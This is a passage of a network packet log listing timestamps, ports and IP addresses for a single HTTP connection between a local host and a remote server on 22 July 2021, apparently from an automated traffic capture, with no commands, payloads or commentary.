Jul 22, 2021 11:28:05.792383909 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792404890 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792427063 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792429924 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.792447090 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792469978 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.792471886 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792494059 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792515039 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792524099 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.792538881 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792561054 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792562962 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.792582035 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792603016 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.792603016 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792623997 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792645931 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.792648077 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792671919 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792690039 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.792692900 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792715073 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792736053 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792737007 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.792758942 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792779922 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792783976 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.792802095 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792824984 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.792825937 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792849064 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792867899 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.792869091 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792890072 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792911053 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.792911053 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792932034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792953014 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792953968 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.792975903 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792999029 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793020010 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793029070 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.793040037 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.793041945 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793064117 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793085098 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793104887 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.793106079 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793128014 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793148994 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793159008 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.793170929 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.793173075 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793195963 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793219090 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793225050 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.793241024 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793262005 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793277979 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.793282986 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793304920 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793323994 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793348074 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793370962 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793360949 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.793391943 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793405056 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.793411970 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.793414116 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793430090 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.793436050 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793456078 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793477058 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793497086 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793520927 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793543100 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793545961 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.793574095 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793580055 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.793596029 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793612957 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.793617010 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793637037 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793642998 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.793658018 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793672085 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.793705940 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793728113 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793750048 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793766975 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.793771982 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793803930 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793828964 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.793828964 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793838978 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.793849945 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793870926 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793891907 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793909073 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.793912888 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793926001 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.793937922 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793960094 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.793981075 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794002056 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794009924 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.794023991 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794045925 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794054985 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.794066906 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794075012 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.794095039 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794116974 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.794116974 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794138908 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794151068 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.794159889 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794183969 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794190884 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.794207096 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794229031 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794239044 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.794251919 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794272900 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794277906 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.794294119 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794315100 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794322968 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.794334888 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794353962 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.794358969 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794370890 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.794380903 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794400930 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794418097 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.794423103 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794444084 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794462919 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794475079 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.794485092 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794488907 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.794504881 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794528961 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794548035 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.794549942 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794572115 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794581890 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.794595003 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.794624090 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.801512957 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.875173092 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.875201941 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.875221968 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.875247002 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.875284910 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.875314951 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.875823975 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.875845909 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.875865936 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.875885963 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.875917912 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.875957012 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.876374006 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.876394987 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.876420021 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.876449108 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.876579046 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.876600981 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.876621008 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.876641035 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.876651049 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.876678944 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.876679897 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.876712084 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.876741886 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.876756907 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.876775026 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.876806021 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.876806974 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.876836061 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.876854897 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.876867056 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.876895905 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.876924038 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.876929998 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.876959085 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.876987934 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877012968 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.877021074 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877048969 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.877053022 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877082109 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877110958 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877120018 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.877141953 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877171993 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877173901 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.877202034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877232075 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877247095 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.877264023 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877294064 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877296925 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.877325058 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877355099 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877367020 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.877383947 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877402067 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.877409935 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877429962 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877460003 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877473116 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.877480984 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877496958 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877511978 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877528906 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877554893 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.877557039 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877585888 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877608061 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877618074 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.877630949 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877648115 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.877656937 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877681017 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877690077 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.877703905 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877723932 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877753973 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877785921 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877794981 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.877799988 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.877816916 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877846956 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877856970 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.877876997 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877902985 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877907991 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.877924919 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877949953 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877949953 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.877974033 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.877989054 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.878000021 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878020048 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878043890 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.878046036 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878071070 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878091097 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.878128052 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878155947 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878177881 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.878186941 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878216982 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878238916 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.878246069 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878274918 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878297091 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.878304005 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878338099 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878355026 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.878369093 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878396988 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878423929 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.878426075 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878454924 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878477097 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.878484011 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878508091 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878525019 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.878532887 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878559113 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878570080 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.878582954 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878602982 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878626108 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.878628969 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878649950 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878669977 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.878674984 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878695011 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878720045 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.878722906 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878755093 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878772020 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.878787994 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878809929 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878834009 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.878834963 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878856897 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878875971 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878895998 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878906012 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.878920078 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878928900 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.878947020 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878962040 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.878972054 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.878997087 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.879018068 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.879023075 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.879045010 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.879067898 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.879096985 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.879111052 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.879156113 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.879157066 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.879183054 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.879204035 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.879209042 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.879244089 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.879251003 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.882874012 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.882900953 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.882972956 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.884210110 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.954865932 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.954924107 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.954973936 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.955015898 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.955028057 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.955082893 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.955120087 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.955156088 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.955193043 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.955230951 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.955236912 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.955266953 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.955296993 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.955305099 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.955363989 CEST	49720	80	192.168.2.3	94.228.114.197
